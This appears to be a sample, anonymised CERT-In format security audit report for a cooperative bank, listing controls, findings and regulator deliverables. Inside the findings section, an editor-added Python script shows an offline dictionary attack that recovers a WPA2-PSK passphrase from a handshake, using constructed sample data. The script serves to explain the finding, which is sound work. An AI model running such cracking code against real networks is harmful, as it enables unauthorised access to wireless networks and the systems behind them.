
Information Security Audit Report — CERT-In Format
A representative, anonymised Macksofy CERT-In format audit report. It demonstrates the structure, control attestation table, regulator submission package and auditor statement that we deliver on real engagements.
1. Auditor and Empanelment
This information security audit was conducted by Macksofy Technologies Pvt Ltd, an Information Security Auditor empanelled by the Indian Computer Emergency Response Team (CERT-In) under the Ministry of Electronics and Information Technology, Government of India.
| Auditor | Macksofy Technologies Pvt Ltd |
| Empanelment | CERT-In Empanelled Information Security Auditor (sample) |
| Auditor address | 308, Building No. 11, SRA Commercial Tower, BKC, Mumbai 400051 |
| Engagement Lead | Senior Consultant — OSCP / OSWE certified |
| Lead Auditor signature | Digitally signed copy attached separately |
| Audit period | 10 working days · April 2026 |
| Report date | April 2026 |
2. Auditee Organisation
| Auditee | Acme Cooperative Bank Ltd (anonymised) |
| Sector | Cooperative Bank · Tier-2 (RBI 4-Tier Framework) |
| Regulator | Reserve Bank of India (RBI) |
| Audit objective | Annual cybersecurity audit per RBI Cyber Security Framework + System Audit Report submission |
| Branches in scope | 47 branches · Western Maharashtra |
| Critical systems | Core Banking System · ATM switch · Internet Banking · Mobile Banking · NEFT/RTGS |
3. Audit Scope & Methodology
3.1 In-scope domains
- Information Security Governance and Policies
- Risk Management and Asset Inventory
- Access Control and Identity Management
- Network Security (perimeter, internal, segmentation)
- Application Security (Internet Banking + Mobile Banking)
- Endpoint Security and ATM Environment
- Logging, Monitoring and Incident Response
- Third-party Risk Management
- Business Continuity and Disaster Recovery
- Customer Awareness and Anti-Phishing
3.2 Methodology
The audit was conducted in line with the RBI Cyber Security Framework (June 2016, as subsequently updated), the RBI Master Direction on Information Technology Governance, Risk, Controls and Assurance Practices (2023) and the CERT-In Information Security Audit Scope. It comprised documentary review, interviews with key personnel, configuration inspection on a sample of in-scope systems, technical Vulnerability Assessment and Penetration Testing (VAPT) of internet-facing assets, and a walk-through of the incident response runbooks.
4. Control Attestation Summary
Compliance status of the 89 assessed sub-controls, grouped into the eight high-level control domains used in this report to map the RBI Cyber Security Framework. A sub-control is counted as Partial where the control exists but evidence of consistent operation was incomplete. Detailed sub-control evidence is provided in Annexure A of the full report.
| Domain | Sub-controls | Compliant | Partial | Non-compliant |
|---|---|---|---|---|
| Governance and policy | 12 | 11 | 1 | 0 |
| Risk management | 8 | 6 | 2 | 0 |
| Access control | 14 | 11 | 2 | 1 |
| Network security | 18 | 14 | 3 | 1 |
| Application security | 11 | 7 | 3 | 1 |
| Endpoint + ATM | 9 | 7 | 1 | 1 |
| Monitoring + IR | 10 | 8 | 2 | 0 |
| BCP / DR | 7 | 6 | 1 | 0 |
| Total | 89 | 70 | 15 | 4 |
Overall posture: 70 of 89 sub-controls compliant (78.7%), 15 partial and 4 non-compliant. This is a strong baseline with localised gaps in application security and ATM-network segmentation. None of the four non-compliant sub-controls is assessed as posing a risk to systemic stability; all are remediable within a 90-day window.
5. Findings Register (Material)
| Ref | Finding | Severity | Target close |
|---|---|---|---|
| F-001 | ATM management network not segmented from branch LAN | Critical | 30 days |
| F-002 | Mobile banking app missing certificate-pinning | Critical | 30 days |
| F-003 | Privileged Active Directory accounts without smartcard / hardware MFA | Critical | 60 days |
| F-004 | Wi-Fi at 3 branches uses WPA2-PSK with shared password | Critical | 30 days |
| F-005 | DR site replication lag exceeds RPO target during peak hours | High | 60 days |
| F-006 | Internet banking session timeout 30min — exceeds RBI guideline | High | 30 days |
| F-007 | Vendor remote-access uses shared service account | High | 60 days |
| F-008 | SOC alert volume — false-positive rate ~62% on top use-case | High | 60 days |
Eight material findings are shown in this sample. The full report contains the complete register with proof-of-concept evidence, a recommended fix and the management response for each finding.
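To illustrate the risk behind F-004 (an editor-added example, not part of Macksofy's report or its proof-of-concept evidence): WPA2-PSK derives the pairwise master key from the passphrase and SSID alone, so anyone who captures a single 4-way handshake on the branch Wi-Fi can test passphrase guesses offline against the EAPOL MIC, with no further contact with the network. The SSID, passphrase, MAC addresses, nonces and wordlist below are constructed for the demonstration, and the EAPOL bytes are a placeholder rather than a parsed frame; the PSK derivation itself matches the IEEE 802.11 Annex test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK from a passphrase: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds,
    256-bit output (IEEE 802.11). Deterministic, so anyone who knows the SSID
    can evaluate passphrase guesses offline."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK are the KCK, the key that authenticates EAPOL-Key messages."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


# Constructed sample handshake for a hypothetical branch SSID (not captured traffic).
SSID = "BranchWiFi"
TRUE_PASSPHRASE = "Branch@2024"  # the one shared secret every staff member knows
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Placeholder for EAPOL-Key message 2 with its MIC field zeroed. A real attacker
# parses these bytes out of the capture; the layout here is illustrative only.
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + SNONCE + b"\x00" * 16


def captured_mic() -> bytes:
    """What the legitimate client transmits: the MIC computed with the real passphrase."""
    kck = kck_from_pmk(wpa2_psk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_M2)


def recover_passphrase(candidates, mic: bytes = None):
    """Offline dictionary attack: everything except the passphrase is visible in the
    capture, so each guess is verified locally against the captured MIC."""
    mic = captured_mic() if mic is None else mic
    for cand in candidates:
        kck = kck_from_pmk(wpa2_psk(cand, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, EAPOL_M2), mic):
            return cand
    return None


if __name__ == "__main__":
    wordlist = ["password", "Branch2023", "branch@2024", "Welcome1", "Branch@2024"]
    print("recovered passphrase:", recover_passphrase(wordlist))
```

Because the derivation has no per-user secret, a longer passphrase only raises the attacker's cost; it does not remove the offline-crackable property or the fact that every current and former staff member holds the same credential. That is why the practitioner-level fix for branch Wi-Fi is per-user 802.1X authentication (for example EAP-TLS with client certificates) rather than a stronger shared PSK.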
6. Regulator Submission Package
Macksofy delivers the following artefacts as part of every CERT-In format engagement, structured for direct submission to RBI / SEBI / UIDAI / IRDAI inspections:
- This signed audit report (Sections 1–7)
- Annexure A — full sub-control evidence register (89 controls)
- Annexure B — VAPT findings + proof-of-concept evidence
- Annexure C — interview transcripts and personnel attestations
- Annexure D — network diagrams + asset register snapshot
- Annexure E — incident-response runbook walkthrough notes
- Annexure F — third-party / vendor risk register
- Annexure G — BCP / DR test report
- Macksofy CERT-In empanelment letter (separate cover)
- Auditor digital signature certificate
7. Auditor Statement
Based on the procedures performed and evidence reviewed during the audit period, in our professional opinion the auditee organisation maintains an information security control environment that is broadly compliant with the RBI Cyber Security Framework, with localised exceptions captured in Section 5. The identified critical and high-severity findings are addressable within the indicated timelines and Macksofy has agreed to perform a complimentary retest within 30 days of remediation closure.
This audit was performed in good faith based on the documents and systems made available during the audit window. No assurance is provided regarding controls or systems outside the agreed scope.
